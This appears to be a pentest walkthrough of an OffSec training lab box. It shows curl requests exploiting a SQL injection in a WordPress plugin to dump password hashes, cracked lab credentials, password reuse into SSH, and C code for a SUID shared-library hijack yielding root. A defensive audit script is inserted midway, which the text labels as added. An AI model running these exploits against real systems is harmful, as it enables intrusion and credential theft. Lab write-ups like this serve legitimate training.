workaholic

🧪 Pentest Log: 2025-08-03

๐Ÿ” Target Information

ip=192.168.223.229

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 80

Web Content Enumeration

wpscan --url http://workaholic.offsec

Found plugin:

[+] wp-advanced-search
 | Location: http://workaholic.offsec/wp-content/plugins/wp-advanced-search/
 | Last Updated: 2024-11-05T18:15:00.000Z
 | [!] The version is out of date, the latest version is 3.3.9.3
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 3.3.8 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://workaholic.offsec/wp-content/plugins/wp-advanced-search/readme.txt

Searched for exploits and found CVE-2024-9796:

https://wpscan.com/vulnerability/2ddd6839-6bcb-4bb8-97e0-1516b8c2b99b/

💣 Exploitation

📌 Vulnerability Summary

CVE-2024-9796: the plugin's autocompletion endpoint (autocompletion-PHP5.5.php) puts the `t` (table) and `f` (field) query parameters straight into its SQL query, so an unauthenticated request can read arbitrary tables such as wp_users.

🚀 Exploit Execution

🔧 Exploit Method

Tool / Script Used:

curl "https://workaholic.offsec/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"

curl "https://workaholic.offsec/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_pass&type=&e"

Cracked the retrieved hashes with john:

john --wordlist=../../rockyou.txt --format=phpass crackme.txt

Obtained credentials:

ted:okadamat17
charlie:chrish20

Logged in to the FTP server with ted's credentials:

ftp ted@$ip

Found the database password in wp-config.php:

rU)tJnTw5*ShDt4nOx

SSH

charlie:rU)tJnTw5*ShDt4nOx

ssh charlie@$ip

🧬 Privilege Escalation

👤 Current Access

charlie, via SSH, using the database password reused from wp-config.php

๐Ÿ” Enumeration

SUID:

find / -type f -perm -4000 2>/dev/null

Found /var/www/html/wordpress/blog/wp-monitor with the SUID bit set:

strings /var/www/html/wordpress/blog/wp-monitor

Found that it loads the shared library /home/ted/.lib/libsecurity.so
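As an added defensive check that is not part of the original log: a POSIX sh audit that repeats the find/strings step above for every SUID binary and flags any embedded shared-library path that sits outside the system library directories or is writable by the current user, which is the condition that made /home/ted/.lib/libsecurity.so reachable from wp-monitor. The function names and the trusted-directory list are my own choices.

```sh
#!/bin/sh
# Defensive audit (added example, not part of the original log): find SUID
# binaries and flag embedded shared-library paths that sit outside the system
# library directories or are writable by the current user. That is the
# condition wp-monitor was in with /home/ted/.lib/libsecurity.so.
# Function names and the trusted-directory list below are my own choices.

# Print the absolute *.so paths embedded in a binary (a portable
# equivalent of `strings BIN | grep '\.so'`).
embedded_libs() {
    tr -c '[:print:]' '\n' < "$1" | grep -oE '/[^[:space:]"]+\.so(\.[0-9]+)*' | sort -u
}

# Exit 0 and print a reason when a library path could be replaced by a
# non-root user; exit 1 when it lives in a root-owned system directory.
lib_risk() {
    case "$1" in
        /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*|/usr/local/lib/*)
            if [ -w "$1" ]; then echo "writable by $(id -un)"; return 0; fi
            return 1 ;;
        *)
            if [ -e "$1" ]; then
                echo "outside system library dirs"
            else
                echo "outside system library dirs and not present (plantable)"
            fi
            return 0 ;;
    esac
}

# Print "<binary> <library> <reason>" for every risky library in one binary.
audit_suid_binary() {
    bin=$1
    embedded_libs "$bin" | while read -r lib; do
        if reason=$(lib_risk "$lib"); then
            printf '%s %s %s\n' "$bin" "$lib" "$reason"
        fi
    done
}

# Walk every SUID file on the host, as the log did by hand with find.
audit_host() {
    find / -type f -perm -4000 2>/dev/null | while read -r bin; do
        audit_suid_binary "$bin"
    done
}

if [ "${1:-}" = "--host" ]; then audit_host; fi
```

Run it as `sh audit.sh --host` on the target; any line it prints is a SUID binary whose library search path a non-root user can influence.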

🔓 Privilege Escalation Exploit

📌 Exploit Summary

wp-monitor is SUID root and loads /home/ted/.lib/libsecurity.so from a user-writable home directory, so the library can be replaced with one whose constructor runs as root and leaves a SUID copy of bash behind.

🔧 Exploit Steps

vim exploit.c

#include <stdlib.h>
#include <unistd.h>

// constructor entry point: runs as root when wp-monitor loads the library
void _init() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash /home/ted/");
    system("chmod +s /home/ted/bash");
}

gcc -shared -fPIC -nostartfiles -o /home/ted/.lib/libsecurity.so exploit.c

/var/www/html/wordpress/blog/wp-monitor

./bash -p